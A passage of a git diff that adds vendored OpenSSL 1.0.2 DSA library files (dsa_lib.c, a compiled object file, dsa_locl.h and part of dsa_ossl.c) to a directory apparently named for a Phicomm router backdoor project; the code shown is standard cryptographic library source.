+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* Original version from Steven Schoch <schoch@sheba.arc.nasa.gov> */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/dsa.h>
+#include <openssl/asn1.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+const char DSA_version[] = "DSA" OPENSSL_VERSION_PTEXT;
+
+static const DSA_METHOD *default_DSA_method = NULL;
+
+void DSA_set_default_method(const DSA_METHOD *meth)
+{
+    default_DSA_method = meth;
+}
+
+const DSA_METHOD *DSA_get_default_method(void)
+{
+    if (!default_DSA_method) {
+#ifdef OPENSSL_FIPS
+        if (FIPS_mode())
+            return FIPS_dsa_openssl();
+        else
+            return DSA_OpenSSL();
+#else
+        default_DSA_method = DSA_OpenSSL();
+#endif
+    }
+    return default_DSA_method;
+}
+
+DSA *DSA_new(void)
+{
+    return DSA_new_method(NULL);
+}
+
+int DSA_set_method(DSA *dsa, const DSA_METHOD *meth)
+{
+    /*
+     * NB: The caller is specifically setting a method, so it's not up to us
+     * to deal with which ENGINE it comes from.
+     */
+    const DSA_METHOD *mtmp;
+    mtmp = dsa->meth;
+    if (mtmp->finish)
+        mtmp->finish(dsa);
+#ifndef OPENSSL_NO_ENGINE
+    if (dsa->engine) {
+        ENGINE_finish(dsa->engine);
+        dsa->engine = NULL;
+    }
+#endif
+    dsa->meth = meth;
+    if (meth->init)
+        meth->init(dsa);
+    return 1;
+}
+
+DSA *DSA_new_method(ENGINE *engine)
+{
+    DSA *ret;
+
+    ret = (DSA *)OPENSSL_malloc(sizeof(DSA));
+    if (ret == NULL) {
+        DSAerr(DSA_F_DSA_NEW_METHOD, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    ret->meth = DSA_get_default_method();
+#ifndef OPENSSL_NO_ENGINE
+    if (engine) {
+        if (!ENGINE_init(engine)) {
+            DSAerr(DSA_F_DSA_NEW_METHOD, ERR_R_ENGINE_LIB);
+            OPENSSL_free(ret);
+            return NULL;
+        }
+        ret->engine = engine;
+    } else
+        ret->engine = ENGINE_get_default_DSA();
+    if (ret->engine) {
+        ret->meth = ENGINE_get_DSA(ret->engine);
+        if (!ret->meth) {
+            DSAerr(DSA_F_DSA_NEW_METHOD, ERR_R_ENGINE_LIB);
+            ENGINE_finish(ret->engine);
+            OPENSSL_free(ret);
+            return NULL;
+        }
+    }
+#endif
+
+    ret->pad = 0;
+    ret->version = 0;
+    ret->write_params = 1;
+    ret->p = NULL;
+    ret->q = NULL;
+    ret->g = NULL;
+
+    ret->pub_key = NULL;
+    ret->priv_key = NULL;
+
+    ret->kinv = NULL;
+    ret->r = NULL;
+    ret->method_mont_p = NULL;
+
+    ret->references = 1;
+    ret->flags = ret->meth->flags & ~DSA_FLAG_NON_FIPS_ALLOW;
+    CRYPTO_new_ex_data(CRYPTO_EX_INDEX_DSA, ret, &ret->ex_data);
+    if ((ret->meth->init != NULL) && !ret->meth->init(ret)) {
+#ifndef OPENSSL_NO_ENGINE
+        if (ret->engine)
+            ENGINE_finish(ret->engine);
+#endif
+        CRYPTO_free_ex_data(CRYPTO_EX_INDEX_DSA, ret, &ret->ex_data);
+        OPENSSL_free(ret);
+        ret = NULL;
+    }
+
+    return (ret);
+}
+
+void DSA_free(DSA *r)
+{
+    int i;
+
+    if (r == NULL)
+        return;
+
+    i = CRYPTO_add(&r->references, -1, CRYPTO_LOCK_DSA);
+#ifdef REF_PRINT
+    REF_PRINT("DSA", r);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "DSA_free, bad reference count\n");
+        abort();
+    }
+#endif
+
+    if (r->meth->finish)
+        r->meth->finish(r);
+#ifndef OPENSSL_NO_ENGINE
+    if (r->engine)
+        ENGINE_finish(r->engine);
+#endif
+
+    CRYPTO_free_ex_data(CRYPTO_EX_INDEX_DSA, r, &r->ex_data);
+
+    if (r->p != NULL)
+        BN_clear_free(r->p);
+    if (r->q != NULL)
+        BN_clear_free(r->q);
+    if (r->g != NULL)
+        BN_clear_free(r->g);
+    if (r->pub_key != NULL)
+        BN_clear_free(r->pub_key);
+    if (r->priv_key != NULL)
+        BN_clear_free(r->priv_key);
+    if (r->kinv != NULL)
+        BN_clear_free(r->kinv);
+    if (r->r != NULL)
+        BN_clear_free(r->r);
+    OPENSSL_free(r);
+}
+
+int DSA_up_ref(DSA *r)
+{
+    int i = CRYPTO_add(&r->references, 1, CRYPTO_LOCK_DSA);
+#ifdef REF_PRINT
+    REF_PRINT("DSA", r);
+#endif
+#ifdef REF_CHECK
+    if (i < 2) {
+        fprintf(stderr, "DSA_up_ref, bad reference count\n");
+        abort();
+    }
+#endif
+    return ((i > 1) ? 1 : 0);
+}
+
+int DSA_size(const DSA *r)
+{
+    int ret, i;
+    ASN1_INTEGER bs;
+    unsigned char buf[4];       /* 4 bytes looks really small. However,
+                                 * i2d_ASN1_INTEGER() will not look beyond
+                                 * the first byte, as long as the second
+                                 * parameter is NULL. */
+
+    i = BN_num_bits(r->q);
+    bs.length = (i + 7) / 8;
+    bs.data = buf;
+    bs.type = V_ASN1_INTEGER;
+    /* If the top bit is set the asn1 encoding is 1 larger. */
+    buf[0] = 0xff;
+
+    i = i2d_ASN1_INTEGER(&bs, NULL);
+    i += i;                     /* r and s */
+    ret = ASN1_object_size(1, i, V_ASN1_SEQUENCE);
+    return (ret);
+}
+
+int DSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
+                         CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func)
+{
+    return CRYPTO_get_ex_new_index(CRYPTO_EX_INDEX_DSA, argl, argp,
+                                   new_func, dup_func, free_func);
+}
+
+int DSA_set_ex_data(DSA *d, int idx, void *arg)
+{
+    return (CRYPTO_set_ex_data(&d->ex_data, idx, arg));
+}
+
+void *DSA_get_ex_data(DSA *d, int idx)
+{
+    return (CRYPTO_get_ex_data(&d->ex_data, idx));
+}
+
+#ifndef OPENSSL_NO_DH
+DH *DSA_dup_DH(const DSA *r)
+{
+    /*
+     * DSA has p, q, g, optional pub_key, optional priv_key. DH has p,
+     * optional length, g, optional pub_key, optional priv_key, optional q.
+     */
+
+    DH *ret = NULL;
+
+    if (r == NULL)
+        goto err;
+    ret = DH_new();
+    if (ret == NULL)
+        goto err;
+    if (r->p != NULL)
+        if ((ret->p = BN_dup(r->p)) == NULL)
+            goto err;
+    if (r->q != NULL) {
+        ret->length = BN_num_bits(r->q);
+        if ((ret->q = BN_dup(r->q)) == NULL)
+            goto err;
+    }
+    if (r->g != NULL)
+        if ((ret->g = BN_dup(r->g)) == NULL)
+            goto err;
+    if (r->pub_key != NULL)
+        if ((ret->pub_key = BN_dup(r->pub_key)) == NULL)
+            goto err;
+    if (r->priv_key != NULL)
+        if ((ret->priv_key = BN_dup(r->priv_key)) == NULL)
+            goto err;
+
+    return ret;
+
+ err:
+    if (ret != NULL)
+        DH_free(ret);
+    return NULL;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..defde2721fbc53fadaa8f0225c14e1f179677076
GIT binary patch
literal 5560
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_locl.h
new file mode 100644
index 0000000..9c23c3e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_locl.h
@@ -0,0 +1,69 @@
+/* ====================================================================
+ * Copyright (c) 2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/dsa.h>
+
+int dsa_builtin_paramgen(DSA *ret, size_t bits, size_t qbits,
+                         const EVP_MD *evpmd, const unsigned char *seed_in,
+                         size_t seed_len, unsigned char *seed_out,
+                         int *counter_ret, unsigned long *h_ret,
+                         BN_GENCB *cb);
+
+int dsa_builtin_paramgen2(DSA *ret, size_t L, size_t N,
+                          const EVP_MD *evpmd, const unsigned char *seed_in,
+                          size_t seed_len, int idx, unsigned char *seed_out,
+                          int *counter_ret, unsigned long *h_ret,
+                          BN_GENCB *cb);
+
+int dsa_paramgen_check_g(DSA *dsa);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ossl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ossl.c
new file mode 100644
index 0000000..665f40a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ossl.c
@@ -0,0 +1,422 @@
+/* crypto/dsa/dsa_ossl.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/* Original version from Steven Schoch <schoch@sheba.arc.nasa.gov> */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/sha.h>
+#include <openssl/dsa.h>
+#include <openssl/rand.h>
+#include <openssl/asn1.h>
+
+static DSA_SIG *dsa_do_sign(const unsigned char *dgst, int dlen, DSA *dsa);
+static int dsa_sign_setup(DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp,
+                          BIGNUM **rp);
+static int dsa_do_verify(const unsigned char *dgst, int dgst_len,
+                         DSA_SIG *sig, DSA *dsa);
+static int dsa_init(DSA *dsa);
+static int dsa_finish(DSA *dsa);
+
+static DSA_METHOD openssl_dsa_meth = {
+    "OpenSSL DSA method",
+    dsa_do_sign,
+    dsa_sign_setup,
+    dsa_do_verify,
+    NULL,                       /* dsa_mod_exp, */
+    NULL,                       /* dsa_bn_mod_exp, */
+    dsa_init,
+    dsa_finish,
+    0,
+    NULL,
+    NULL,
+    NULL
+};
+
+/*-
+ * These macro wrappers replace attempts to use the dsa_mod_exp() and
+ * bn_mod_exp() handlers in the DSA_METHOD structure. We avoid the problem of
+ * having a the macro work as an expression by bundling an "err_instr". So;
+ *
+ *     if (!dsa->meth->bn_mod_exp(dsa, r,dsa->g,&k,dsa->p,ctx,
+ *                 dsa->method_mont_p)) goto err;
+ *
+ * can be replaced by;
+ *
+ *     DSA_BN_MOD_EXP(goto err, dsa, r, dsa->g, &k, dsa->p, ctx,
+ *                 dsa->method_mont_p);
+ */
+
+#define DSA_MOD_EXP(err_instr,dsa,rr,a1,p1,a2,p2,m,ctx,in_mont) \
+        do { \
+        int _tmp_res53; \
+        if((dsa)->meth->dsa_mod_exp) \
+                _tmp_res53 = (dsa)->meth->dsa_mod_exp((dsa), (rr), (a1), (p1), \
+                                (a2), (p2), (m), (ctx), (in_mont)); \
+        else \
+                _tmp_res53 = BN_mod_exp2_mont((rr), (a1), (p1), (a2), (p2), \
+                                (m), (ctx), (in_mont)); \
+        if(!_tmp_res53) err_instr; \
+        } while(0)
+#define DSA_BN_MOD_EXP(err_instr,dsa,r,a,p,m,ctx,m_ctx) \
+        do { \
+        int _tmp_res53; \
+        if((dsa)->meth->bn_mod_exp) \
+                _tmp_res53 = (dsa)->meth->bn_mod_exp((dsa), (r), (a), (p), \
+                                (m), (ctx), (m_ctx)); \
+        else \
+                _tmp_res53 = BN_mod_exp_mont((r), (a), (p), (m), (ctx), (m_ctx)); \
+        if(!_tmp_res53) err_instr; \
+        } while(0)
+
+const DSA_METHOD *DSA_OpenSSL(void)
+{
+    return &openssl_dsa_meth;
+}
+
+static DSA_SIG *dsa_do_sign(const unsigned char *dgst, int dlen, DSA *dsa)
+{
+    BIGNUM *kinv = NULL, *r = NULL, *s = NULL;
+    BIGNUM m;
+    BIGNUM xr;
+    BN_CTX *ctx = NULL;
+    int reason = ERR_R_BN_LIB;
+    DSA_SIG *ret = NULL;
+    int noredo = 0;
+
+    BN_init(&m);
+    BN_init(&xr);
+
+    if (!dsa->p || !dsa->q || !dsa->g) {
+        reason = DSA_R_MISSING_PARAMETERS;
+        goto err;
+    }
+
+    s = BN_new();
+    if (s == NULL)
+        goto err;
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        goto err;
+ redo:
+    if ((dsa->kinv == NULL) || (dsa->r == NULL)) {
+        if (!DSA_sign_setup(dsa, ctx, &kinv, &r))
+            goto err;
+    } else {
+        kinv = dsa->kinv;
+        dsa->kinv = NULL;
+        r = dsa->r;
+        dsa->r = NULL;
+        noredo = 1;
+    }
+
+    if (dlen > BN_num_bytes(dsa->q))
+        /*
+         * if the digest length is greater than the size of q use the
+         * BN_num_bits(dsa->q) leftmost bits of the digest, see fips 186-3,
+         * 4.2
+         */
+        dlen = BN_num_bytes(dsa->q);
+    if (BN_bin2bn(dgst, dlen, &m) == NULL)
+        goto err;
+
+    /* Compute  s = inv(k) (m + xr) mod q */
+    if (!BN_mod_mul(&xr, dsa->priv_key, r, dsa->q, ctx))
+        goto err;               /* s = xr */
+    if (!BN_add(s, &xr, &m))
+        goto err;               /* s = m + xr */
+    if (BN_cmp(s, dsa->q) > 0)
+        if (!BN_sub(s, s, dsa->q))
+            goto err;
+    if (!BN_mod_mul(s, s, kinv, dsa->q, ctx))
+        goto err;
+
+    ret = DSA_SIG_new();
+    if (ret == NULL)
+        goto err;
+    /*
+     * Redo if r or s is zero as required by FIPS 186-3: this is very
+     * unlikely.
+     */
+    if (BN_is_zero(r) || BN_is_zero(s)) {
+        if (noredo) {
+            reason = DSA_R_NEED_NEW_SETUP_VALUES;
+            goto err;
+        }
+        goto redo;
+    }
+    ret->r = r;
+    ret->s = s;
+
+ err:
+    if (!ret) {
+        DSAerr(DSA_F_DSA_DO_SIGN, reason);
+        BN_free(r);
+        BN_free(s);
+    }
+    if (ctx != NULL)
+        BN_CTX_free(ctx);
+    BN_clear_free(&m);
+    BN_clear_free(&xr);
+    if (kinv != NULL)           /* dsa->kinv is NULL now if we used it */
+        BN_clear_free(kinv);
+    return (ret);
+}
+
+static int dsa_sign_setup(DSA *dsa, BN_CTX *ctx_in, BIGNUM **kinvp,
+                          BIGNUM **rp)
+{
+    BN_CTX *ctx;
+    BIGNUM k, kq, *K, *kinv = NULL, *r = NULL;
+    int ret = 0;
+
+    if (!dsa->p || !dsa->q || !dsa->g) {
+        DSAerr(DSA_F_DSA_SIGN_SETUP, DSA_R_MISSING_PARAMETERS);
+        return 0;
+    }
+
+    BN_init(&k);
+    BN_init(&kq);
+
+    if (ctx_in == NULL) {
+        if ((ctx = BN_CTX_new()) == NULL)
+            goto err;
+    } else
+        ctx = ctx_in;
+
+    if ((r = BN_new()) == NULL)
+        goto err;
+
+    /* Get random k */
+    do
+        if (!BN_rand_range(&k, dsa->q))
+            goto err;
+    while (BN_is_zero(&k)) ;
+    if ((dsa->flags & DSA_FLAG_NO_EXP_CONSTTIME) == 0) {
+        BN_set_flags(&k, BN_FLG_CONSTTIME);
+    }
+
+    if (dsa->flags & DSA_FLAG_CACHE_MONT_P) {
+        if (!BN_MONT_CTX_set_locked(&dsa->method_mont_p,
+                                    CRYPTO_LOCK_DSA, dsa->p, ctx))
+            goto err;
+    }
+
+    /* Compute r = (g^k mod p) mod q */
+
+    if ((dsa->flags & DSA_FLAG_NO_EXP_CONSTTIME) == 0) {
+        if (!BN_copy(&kq, &k))
+            goto err;
+
+        /*
+         * We do not want timing information to leak the length of k, so we
+         * compute g^k using an equivalent exponent of fixed length. (This
+         * is a kludge that we need because the BN_mod_exp_mont() does not
+         * let us specify the desired timing behaviour.)
+         */
+
+        if (!BN_add(&kq, &kq, dsa->q))
+            goto err;
+        if (BN_num_bits(&kq) <= BN_num_bits(dsa->q)) {
+            if (!BN_add(&kq, &kq, dsa->q))
+                goto err;
+        }
+
+        K = &kq;
+    } else {
+        K = &k;
+    }
+    DSA_BN_MOD_EXP(goto err, dsa, r, dsa->g, K, dsa->p, ctx,
+                   dsa->method_mont_p);
+    if (!BN_mod(r, r, dsa->q, ctx))
+        goto err;
+
+    /* Compute  part of 's = inv(k) (m + xr) mod q' */
+    if ((kinv = BN_mod_inverse(NULL, &k, dsa->q, ctx)) == NULL)
+        goto err;
+
+    if (*kinvp != NULL)
+        BN_clear_free(*kinvp);
+    *kinvp = kinv;
+    kinv = NULL;
+    if (*rp != NULL)
+        BN_clear_free(*rp);
+    *rp = r;
+    ret = 1;
+ err:
+    if (!ret) {
+        DSAerr(DSA_F_DSA_SIGN_SETUP, ERR_R_BN_LIB);
+        if (r != NULL)
+            BN_clear_free(r);
+    }
+    if (ctx_in == NULL)
+        BN_CTX_free(ctx);
+    BN_clear_free(&k);
+    BN_clear_free(&kq);
+    return (ret);
+}
+
+static int dsa_do_verify(const unsigned char *dgst, int dgst_len,
+                         DSA_SIG *sig, DSA *dsa)
+{
+    BN_CTX *ctx;
+    BIGNUM u1, u2, t1;
+    BN_MONT_CTX *mont = NULL;
+    int ret = -1, i;
+    if (!dsa->p || !dsa->q || !dsa->g) {
+        DSAerr(DSA_F_DSA_DO_VERIFY, DSA_R_MISSING_PARAMETERS);
+        return -1;
+    }
+
+    i = BN_num_bits(dsa->q);
+    /* fips 186-3 allows only different sizes for q */
+    if (i != 160 && i != 224 && i != 256) {
+        DSAerr(DSA_F_DSA_DO_VERIFY, DSA_R_BAD_Q_VALUE);
+        return -1;
+    }
+
+    if (BN_num_bits(dsa->p) > OPENSSL_DSA_MAX_MODULUS_BITS) {
+        DSAerr(DSA_F_DSA_DO_VERIFY, DSA_R_MODULUS_TOO_LARGE);
+        return -1;
+    }
+    BN_init(&u1);
+    BN_init(&u2);
+    BN_init(&t1);
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+
+    if (BN_is_zero(sig->r) || BN_is_negative(sig->r) ||
+        BN_ucmp(sig->r, dsa->q) >= 0) {
+        ret = 0;
+        goto err;
+    }
+    if (BN_is_zero(sig->s) || BN_is_negative(sig->s) ||
+        BN_ucmp(sig->s, dsa->q) >= 0) {
+        ret = 0;
+        goto err;
+    }
+
+    /*
